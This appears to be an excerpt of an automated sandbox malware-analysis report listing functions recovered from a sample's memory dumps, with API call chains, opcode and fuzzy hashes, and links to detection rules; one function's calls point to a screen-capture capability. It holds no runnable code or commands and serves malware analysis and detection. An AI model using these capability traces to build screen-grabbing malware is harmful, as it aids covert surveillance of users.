                                                                                                                                                                      • Instruction ID: 7936d49148215cbff505b59613dd27cbdee9664500c8d34c0a147f42681ebec0
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                      • Instruction Fuzzy Hash: FD11393608014EBFCF26AF84CC55CEE3F66BF19650F588455FA2859130C736C5B1AB91
                                                                                                                                                                      Function 02BDF338 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                      • Instruction ID: cf095ef20f9a9a86753c694762cb424fbaa4791c992c05924ae3b561c432b5c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                      • Instruction Fuzzy Hash: 31114E3200814ABBCF165E84CC15CEE3F23BF18364B598995FE1959430E73AC6B1AB81
                                                                                                                                                                      Function 0360B7AA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                      • Instruction ID: 1c9ab12ccdbef4d6f61dd9a496d9504f8ecdacac0bbcb1364c79e1790468d3f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                      • Instruction Fuzzy Hash: EB117E7604014EBBCF1A9F84CD56CEE3F26FB08250F088424FA285A170D236C5B1AB85
                                                                                                                                                                      Function 02C6F361 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                      • Instruction ID: 2efe66f2a7fee8da3c8e4974991e675b0dce1a913e27a62764fb3a1baf02dd0e
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A114E3604014AFBCF125E84DC99CEE3F27BB58358F49842AFA1959430D336C6B2AF81
                                                                                                                                                                      Function 037741E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(03774FB5,03774E55,037742BE,00000000,?,?,03774E55,?,?,?,?,00000000,000000FF), ref: 037741E8
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(03774FB5,?,?,?,00000000,000000FF), ref: 037741F6
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(03774FB5), ref: 03774257
                                                                                                                                                                      • SetEvent.KERNEL32(8520468B), ref: 03774272
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3394196147-0
                                                                                                                                                                      • Opcode ID: 39769d5a8b6d0137c5fc2b0431d7da493a45347c7e7f492c728e764b803adde2
                                                                                                                                                                      • Instruction ID: 5db7b54827e7f219afadfa4a7210d5d3c7f5fb84b68b0cddce2753dfc08c4226
                                                                                                                                                                      • Opcode Fuzzy Hash: 39769d5a8b6d0137c5fc2b0431d7da493a45347c7e7f492c728e764b803adde2
                                                                                                                                                                      • Instruction Fuzzy Hash: 341118B0601B05AFDB25DF75D584A96B7E9BF48300B15C96EE45E8B211EB35E812CB00
                                                                                                                                                                      Function 03774B00 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • timeGetTime.WINMM(00000001,?,00000001,?,03773C4F,?,?,00000001), ref: 03774B15
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 03774B24
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 03774B31
                                                                                                                                                                      • timeGetTime.WINMM(?,03773C4F,?,?,00000001), ref: 03774B48
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IncrementInterlockedTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 159728177-0
                                                                                                                                                                      • Opcode ID: 2d29f950abcb92e1be7bc8aed5159d0e1a87a3e91a497eaf2c54820556c93cba
                                                                                                                                                                      • Instruction ID: c5be0eff06ee298ab060f89ae2d84b9ab0a15a166a78ba91c6ae20c8bc27c3a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d29f950abcb92e1be7bc8aed5159d0e1a87a3e91a497eaf2c54820556c93cba
                                                                                                                                                                      • Instruction Fuzzy Hash: D701C8B5600709AFCB20EF7AD88094AFBE8AF5C650701892AE549C7611E674E5458FA0
                                                                                                                                                                      Function 02C64AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • timeGetTime.WINMM(00000001,?,00000001,?,02C63C4F,?,?,00000001), ref: 02C64AF5
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 02C64B04
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 02C64B11
                                                                                                                                                                      • timeGetTime.WINMM(?,02C63C4F,?,?,00000001), ref: 02C64B28
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IncrementInterlockedTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 159728177-0
                                                                                                                                                                      • Opcode ID: 6c38361ec67a061d6d8da1770e7457a37d7585e48e0688ca37b0a91043a776bb
                                                                                                                                                                      • Instruction ID: 7e25217407920401b2a38434738d53e748d40f331157772e524a2fa4254aa104
                                                                                                                                                                      • Opcode Fuzzy Hash: 6c38361ec67a061d6d8da1770e7457a37d7585e48e0688ca37b0a91043a776bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01DAB5A00705AFC720DF7AD880A5AFBF9BF98750750892EE549C7600E774E6448FE0
                                                                                                                                                                      Function 03773660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03773667
                                                                                                                                                                      • _free.LIBCMT ref: 0377369C
                                                                                                                                                                        • Part of subcall function 0377F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03783E4C,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F64F
                                                                                                                                                                        • Part of subcall function 0377F639: GetLastError.KERNEL32(00000000,?,03783E4C,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000), ref: 0377F661
                                                                                                                                                                      • _malloc.LIBCMT ref: 037736D7
                                                                                                                                                                      • _memset.LIBCMT ref: 037736E5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3340475617-0
                                                                                                                                                                      • Opcode ID: 3806aae17cb98ad2d5c9e0c5e9638e05b579b1f73b3367de8ffb54a624c0172f
                                                                                                                                                                      • Instruction ID: f86e4025fb4765d16b546b26924c9c5ff16b33fb9cfcc3775034daa21520486e
                                                                                                                                                                      • Opcode Fuzzy Hash: 3806aae17cb98ad2d5c9e0c5e9638e05b579b1f73b3367de8ffb54a624c0172f
                                                                                                                                                                      • Instruction Fuzzy Hash: BA01DAF5900B04DFE760DF7A9885B97BBE9EB85214F14482ED5AEC7301D635A8058F60
                                                                                                                                                                      Function 02C63660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C63667
                                                                                                                                                                      • _free.LIBCMT ref: 02C6369C
                                                                                                                                                                        • Part of subcall function 02C66E49: HeapFree.KERNEL32(00000000,00000000,?,02C69900,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66E5F
                                                                                                                                                                        • Part of subcall function 02C66E49: GetLastError.KERNEL32(00000000,?,02C69900,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000), ref: 02C66E71
                                                                                                                                                                      • _malloc.LIBCMT ref: 02C636D7
                                                                                                                                                                      • _memset.LIBCMT ref: 02C636E5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3340475617-0
                                                                                                                                                                      • Opcode ID: c1320acf76272d252a2a9d4fbdc8f3bf32ca8fe7d766dd46f15975819a017d58
                                                                                                                                                                      • Instruction ID: cb6f9b9cc6d7edf5512332b7c3c6f93ba014364c024fc68dffa9a302cc1053fa
                                                                                                                                                                      • Opcode Fuzzy Hash: c1320acf76272d252a2a9d4fbdc8f3bf32ca8fe7d766dd46f15975819a017d58
                                                                                                                                                                      • Instruction Fuzzy Hash: 2501C4F1900B449FE3209F7AD8C5BA7BAE9EF85354F10482EE5AE83301D634A9048F60
                                                                                                                                                                      Function 02BD6EEE Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 02BD6F08
                                                                                                                                                                        • Part of subcall function 02BD6E5A: __FF_MSGBANNER.LIBCMT ref: 02BD6E73
                                                                                                                                                                        • Part of subcall function 02BD6E5A: __NMSG_WRITE.LIBCMT ref: 02BD6E7A
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02BD6F3D
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02BD6F57
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BD6F68
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2388904642-0
                                                                                                                                                                      • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                      • Instruction ID: 612d9a7f7a48b13a53dc34b47475defd59ad095de0f701030faffb0870b5226f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                      • Instruction Fuzzy Hash: C4F02831404699A7DB00EB64EC84AED7BFEEB41314F1400A8E4149E0D1FFB1DAC1CB50
                                                                                                                                                                      Function 035FF0C6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 035FF0E0
                                                                                                                                                                        • Part of subcall function 035FF032: __FF_MSGBANNER.LIBCMT ref: 035FF04B
                                                                                                                                                                        • Part of subcall function 035FF032: __NMSG_WRITE.LIBCMT ref: 035FF052
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 035FF115
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 035FF12F
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 035FF140
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2388904642-0
                                                                                                                                                                      • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                      • Instruction ID: 19afa9154ab7612b7ca821b31126310de017f1f333c38a88e8386603f7ad02a2
                                                                                                                                                                      • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                      • Instruction Fuzzy Hash: 87F0F439800316AFDB15EB54FC15ABF7ABDFB80644F94406DDA01AA5F0DB718A02CB40
                                                                                                                                                                      Function 0377CD80 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03771420: HeapFree.KERNEL32(?,00000000,?,?,?,037740B1,?,00000000,03774039,?,74DEDFA0,03773648), ref: 0377143D
                                                                                                                                                                        • Part of subcall function 03771420: _free.LIBCMT ref: 03771459
                                                                                                                                                                      • HeapDestroy.KERNEL32(00000000), ref: 0377CD93
                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?), ref: 0377CDA5
                                                                                                                                                                      • _free.LIBCMT ref: 0377CDB5
                                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 0377CDE2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4097506873-0
                                                                                                                                                                      • Opcode ID: dbda65b41be41c2e1996ce2aea4947b2ceae82acc09c81148f6578ba62458830
                                                                                                                                                                      • Instruction ID: f2cf59613ff713b301656ba0d24e1906d85e29f06e15309101aec7d536f2e25a
                                                                                                                                                                      • Opcode Fuzzy Hash: dbda65b41be41c2e1996ce2aea4947b2ceae82acc09c81148f6578ba62458830
                                                                                                                                                                      • Instruction Fuzzy Hash: 27F04FB9100706ABD710EF24E808B57FBB8FF44B10F158A19E859DB644D734E852CB90
                                                                                                                                                                      Function 02C66490 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C61420: HeapFree.KERNEL32(?,00000000,?,?,?,02C640B1,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C6143D
                                                                                                                                                                        • Part of subcall function 02C61420: _free.LIBCMT ref: 02C61459
                                                                                                                                                                      • HeapDestroy.KERNEL32(00000000), ref: 02C664A3
                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?), ref: 02C664B5
                                                                                                                                                                      • _free.LIBCMT ref: 02C664C5
                                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 02C664F2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4097506873-0
                                                                                                                                                                      • Opcode ID: 91ff612e470b53e669424ebc71a8820fdf192f272128dd722c17638c20c3315f
                                                                                                                                                                      • Instruction ID: bafd575229a192f45f716426cbabb80e16b40cbd5df4ef4caf8fa176f24858a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 91ff612e470b53e669424ebc71a8820fdf192f272128dd722c17638c20c3315f
                                                                                                                                                                      • Instruction Fuzzy Hash: 67F037B5500702ABE720DF25E898B23B7F8FF84754F248918E859D3644DB39E855CBE0
                                                                                                                                                                      Function 035F980F Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 035F997F
                                                                                                                                                                        • Part of subcall function 035FF032: __FF_MSGBANNER.LIBCMT ref: 035FF04B
                                                                                                                                                                        • Part of subcall function 035FF032: __NMSG_WRITE.LIBCMT ref: 035FF052
                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 035F9B42
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _malloc_memcpy_s
                                                                                                                                                                      • String ID: &
                                                                                                                                                                      • API String ID: 3561290194-3042966939
                                                                                                                                                                      • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                                                                      • Instruction ID: 6b8e17329d542dd6fa5ea10c625e10778bda1bc1dfd24a3d39878f40feca980e
                                                                                                                                                                      • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                                                                      • Instruction Fuzzy Hash: 4DC170F1A006199FDB24DF55DCC0BAAB7B8FB88300F1485ADD709A7261D734AA85CF64
                                                                                                                                                                      Function 035FC2CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset_wcsrchr
                                                                                                                                                                      • String ID: D
                                                                                                                                                                      • API String ID: 1675014779-2746444292
                                                                                                                                                                      • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                      • Instruction ID: ffe59406dc0092a19d57dca6d10aa6e31a657f1bd1d9d11cc82acf1dc5f78109
                                                                                                                                                                      • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                      • Instruction Fuzzy Hash: 4931E9729402187BE724D7A4AC8AFFF777CEB44710F140169FB0A9A1D0DA715906C7E5
                                                                                                                                                                      Function 0377B19D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDesktopWindow.USER32 ref: 0377BC8F
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDC.USER32(00000000), ref: 0377BC9C
                                                                                                                                                                        • Part of subcall function 0377BC70: CreateCompatibleDC.GDI32(00000000), ref: 0377BCA2
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDC.USER32(00000000), ref: 0377BCAD
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 0377BCBA
                                                                                                                                                                        • Part of subcall function 0377BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 0377BCC2
                                                                                                                                                                        • Part of subcall function 0377BC70: ReleaseDC.USER32(00000000,00000000), ref: 0377BCD3
                                                                                                                                                                        • Part of subcall function 0377BC70: GetSystemMetrics.USER32(0000004C), ref: 0377BD78
                                                                                                                                                                        • Part of subcall function 0377BC70: GetSystemMetrics.USER32(0000004D), ref: 0377BD8D
                                                                                                                                                                        • Part of subcall function 0377BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0377BDA6
                                                                                                                                                                        • Part of subcall function 0377BC70: SelectObject.GDI32(?,00000000), ref: 0377BDB4
                                                                                                                                                                        • Part of subcall function 0377BC70: SetStretchBltMode.GDI32(?,00000003), ref: 0377BDC0
                                                                                                                                                                        • Part of subcall function 0377BC70: GetSystemMetrics.USER32(0000004F), ref: 0377BDCD
                                                                                                                                                                        • Part of subcall function 0377BC70: GetSystemMetrics.USER32(0000004E), ref: 0377BDE0
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • _memset.LIBCMT ref: 0377B1E1
                                                                                                                                                                      • swprintf.LIBCMT ref: 0377B204
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                                                                                      • String ID: %s %s
                                                                                                                                                                      • API String ID: 1028806752-581060391
                                                                                                                                                                      • Opcode ID: 702c72db160cd81a1c1fb5739f5aeb5435b8c006a9f8a2799fa0b4ffc2acae70
                                                                                                                                                                      • Instruction ID: 1d7fdcf5aa4454b06a2e44a982a0833d587dc5f19bd8873f214cfa8fb47e7a83
                                                                                                                                                                      • Opcode Fuzzy Hash: 702c72db160cd81a1c1fb5739f5aeb5435b8c006a9f8a2799fa0b4ffc2acae70
                                                                                                                                                                      • Instruction Fuzzy Hash: 6521F3B6A04340ABDB10EF14AC88E6FB7E8EFD9710F08056EF4895B201E6609904C7A3
                                                                                                                                                                      Function 03779100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03779115
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF4E
                                                                                                                                                                        • Part of subcall function 0377EF39: __CxxThrowException@8.LIBCMT ref: 0377EF63
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF74
